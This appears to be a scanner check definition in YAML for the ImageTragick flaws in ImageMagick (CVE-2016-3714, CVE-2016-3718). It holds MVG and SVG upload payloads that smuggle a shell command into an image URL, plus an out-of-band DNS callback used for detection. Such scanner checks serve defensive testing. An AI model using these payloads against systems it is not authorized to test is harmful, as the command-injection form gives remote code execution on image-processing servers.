ImageTragick.yaml

generate:
  - into: 'POST_MULTIPART_.*_FILE_value'
  - payload:
    - !!str |
      push graphic-context
      viewbox 0 0 640 480
      fill 'url(https://example.com/image.jpg"|getent hosts DNS_MARKER")'
      pop graphic-context
    - !!str |
      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
      "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg width="640px" height="480px" version="1.1"
      xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
      "http://www.w3.org/1999/xlink">
      <image xlink:href="https://example.com/x.jpg&quot;|getent hosts DNS_MARKER&quot;"
      x="0" y="0" height="640px" width="480px"/>
      </svg>
    - !!str |
      push graphic-context
      viewbox 0 0 640 480
      fill 'url(http://DNS_MARKER/)'
      pop graphic-context
detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 95
  - tags:
    - OS Commanding
    - ImageMagic
    - ImageTragick
    - CVE-2016-3714
    - CVE-2016-3718